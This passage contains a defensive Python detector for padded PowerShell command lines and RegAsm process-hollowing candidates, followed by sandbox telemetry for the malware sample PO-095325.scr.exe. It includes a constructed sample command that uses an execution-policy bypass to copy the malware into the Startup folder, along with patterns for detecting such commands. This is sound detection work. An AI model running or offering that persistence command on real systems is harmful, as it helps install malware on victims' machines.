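from dataclasses import dataclass
from typing import Optional

# Unicode classes that carry no command semantics: Cc control, Cf format (zero-width
# joiner/space, BOM, bidi marks), Co private use, Cs surrogates, Cn unassigned.
# Assumption: the padding the report renders as "?" belongs to one of these classes.
_STRIP_CATEGORIES = {"Cc", "Cf", "Co", "Cs", "Cn"}
# Log pipelines often substitute "?" or U+FFFD for characters they cannot encode;
# a run of three or more is treated as padding residue, not as part of the command.
_RENDERED_PADDING = re.compile(r"[?\ufffd]{3,}")
_EP_BYPASS = re.compile(r"-ex[a-z]*\s+bypass|-ep\s+bypass", re.IGNORECASE)  # any prefix of -ExecutionPolicy
_COPY_ITEM = re.compile(r"\b(?:copy-item|cpi|copy)\b", re.IGNORECASE)  # cmdlet and its aliases
_STARTUP_DIR = re.compile(r"\\start menu\\programs\\startup\\", re.IGNORECASE)
_QUOTED_ARG = re.compile(r"'([^']*)'|\"([^\"]*)\"")
_IMAGE_TOKEN = re.compile(r'^\s*(?:"([^"]+)"|(\S+))\s*(.*)$', re.DOTALL)
_HOLLOW_HOSTS = {"regasm.exe", "regsvcs.exe"}  # .NET tools that do nothing useful without arguments
_TRUSTED_PARENT_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


@dataclass
class Verdict:
    normalized: str
    padded: bool             # non-printing or rendered padding had to be stripped
    ep_bypass: bool          # -ExecutionPolicy Bypass in any abbreviated form
    copies_to_startup: bool  # Copy-Item whose destination is a Startup folder
    destination: Optional[str]

    @property
    def suspicious(self) -> bool:
        return self.copies_to_startup or (self.padded and self.ep_bypass)


def normalize_cmdline(cmdline: str) -> str:
    """Recover the command text the parser sees once the interleaved padding is gone."""
    cleaned = "".join(ch for ch in cmdline if unicodedata.category(ch) not in _STRIP_CATEGORIES)
    return _RENDERED_PADDING.sub("", cleaned)


def copy_destination(normalized: str) -> Optional[str]:
    """Last quoted argument of a Copy-Item call, i.e. its positional -Destination."""
    if not _COPY_ITEM.search(normalized):
        return None
    args = [a or b for a, b in _QUOTED_ARG.findall(normalized)]
    return args[-1] if len(args) >= 2 else None


def analyze(cmdline: str) -> Verdict:
    normalized = normalize_cmdline(cmdline)
    dest = copy_destination(normalized)
    return Verdict(
        normalized=normalized,
        padded=normalized != cmdline,
        ep_bypass=bool(_EP_BYPASS.search(normalized)),
        copies_to_startup=bool(dest and _STARTUP_DIR.search(dest)),
        destination=dest,
    )


def argless_regasm_from_user_path(parent_image: str, cmdline: str) -> bool:
    """RegAsm.exe needs an assembly path to register anything; started with no arguments
    by a parent outside the OS and program directories it is a likely injection host."""
    m = _IMAGE_TOKEN.match(cmdline)
    if not m:
        return False
    image, rest = (m.group(1) or m.group(2)), m.group(3).strip()
    host = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return host in _HOLLOW_HOSTS and not rest and not parent_image.lower().startswith(_TRUSTED_PARENT_DIRS)


# Constructed telemetry modelled on the rows above (paths as reported, padding assumed).
_SRC_DST = ("'C:\\Users\\user\\Desktop\\PO-095325.scr.exe' "
            "'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\command-line.exe'")
_ZW = "\u200b\u200d\ufeff"  # zero-width space, zero-width joiner, BOM


def _pad(text: str, padding: str) -> str:
    return "".join(padding + ch for ch in text)


SAMPLE_UNICODE = '"Powershell.exe" ' + _pad("-ExecutionPolicy Bypass -command Copy-Item", _ZW) + " " + _SRC_DST
SAMPLE_RENDERED = ('"Powershell.exe" ' + _pad("-ExecutionPolicy Bypass -command", "?" * 10)
                   + " " + _pad("Copy-Item", "?" * 9) + " " + _SRC_DST)  # as the report prints it
BENIGN = '"Powershell.exe" -NoProfile -Command Get-Process'
REGASM_PARENT = "C:\\Users\\user\\Desktop\\PO-095325.scr.exe"
REGASM_CMDLINE = '"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"'

if __name__ == "__main__":
    for line in (SAMPLE_UNICODE, SAMPLE_RENDERED, BENIGN):
        v = analyze(line)
        print(f"suspicious={v.suspicious} padded={v.padded} destination={v.destination}")
    print("RegAsm hollowing candidate:", argless_regasm_from_user_path(REGASM_PARENT, REGASM_CMDLINE))
```

A rule that matches the raw CommandLine field for "-ExecutionPolicy Bypass" or "Copy-Item" misses this sample, which is the purpose of the padding; normalizing first also removes the need to enumerate spellings. Apply the same normalization to Sysmon event 1 and Security event 4688 command lines before any string comparison, and keep the padded flag as its own signal: a command line that only makes sense after stripping format characters is itself a strong indicator.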
Source: C:\Users\user\Desktop\PO-095325.scr.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\PO-095325.scr.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\PO-095325.scr.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\PO-095325.scr.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\PO-095325.scr.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\PO-095325.scr.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\PO-095325.scr.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\PO-095325.scr.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\PO-095325.scr.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\PO-095325.scr.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\PO-095325.scr.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\PO-095325.scr.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\PO-095325.scr.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\PO-095325.scr.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\PO-095325.scr.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\PO-095325.scr.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\PO-095325.scr.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\PO-095325.scr.exe | Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: vaultcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\PO-095325.scr.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\PO-095325.scr.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
Source: PO-095325.scr.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: PO-095325.scr.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\GT350\source\repos\AtllasRunp\AtllasRunp\obj\Debug\Bienvenida.pdb source: PO-095325.scr.exe, 00000000.00000002.2032946402.0000000005400000.00000004.08000000.00040000.00000000.sdmp, PO-095325.scr.exe, 00000000.00000002.2029347793.00000000028F1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2056029725.0000000008194000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2053643974.000000000725A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb@70s/ source: powershell.exe, 00000002.00000002.2055885190.000000000815A000.00000004.00000020.00020000.00000000.sdmp
Source: PO-095325.scr.exe | Static PE information: link time stamp 0xC933C395 [Sat Dec 19 14:13:41 2076 UTC]
Source: C:\Users\user\Desktop\PO-095325.scr.exe | Code function: 0_2_04FB24D1 push eax; iretd 0_2_04FB24DD
Source: C:\Users\user\Desktop\PO-095325.scr.exe | Code function: 0_2_04FB1980 pushfd ; retf 0_2_04FB198D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_01600B4D push edi; ret 4_2_01600CC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_01600C95 push edi; retf 4_2_01600C3A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0160DDEF push es; ret 4_2_0160DDF0
Source: PO-095325.scr.exe | Static PE information: section name: .text entropy: 7.959717171479094

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\PO-095325.scr.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
